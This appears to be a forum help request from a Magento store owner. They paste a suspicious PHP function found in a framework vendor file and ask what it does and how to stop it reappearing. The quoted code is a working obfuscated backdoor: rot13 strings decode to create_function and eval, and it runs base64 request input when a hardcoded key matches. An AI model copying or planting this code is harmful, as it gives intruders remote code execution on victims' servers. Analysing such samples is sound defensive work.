I’ve found this script in vendor/magento/framework/Interception/Interceptor.php
public function validate_request($request)
{
$is_safe = false;
$default_function = @create_function('$str', 'return str_rot13($str);');
$keys = ["perngr_shapgvba",
'erghea riny($vachg);'];
$validate = $default_function($keys[0]);
$key_data = $default_function($keys[1]);
$Composer_Validator = @$validate('$input', $key_data);
$safe_match = "5408be1139";
if (isset($request["encryption_key"])) {
$encryption_key = $request["encryption_key"];
if ($safe_match == $encryption_key) {
$is_safe = true;
}
}
$frontName = "/*front*/";
if (isset($request["frontName"])) {
$frontName = $request["frontName"];
$frontName = base64_decode($frontName);
}
if ($is_safe && function_exists($Composer_Validator)) {
$is_safe = (bool) @$Composer_Validator($frontName);
return $is_safe;
}
}
I think it’s a malware, but what it does?
Also, i tried to remove it, but it return, can someone know how to remove it forever?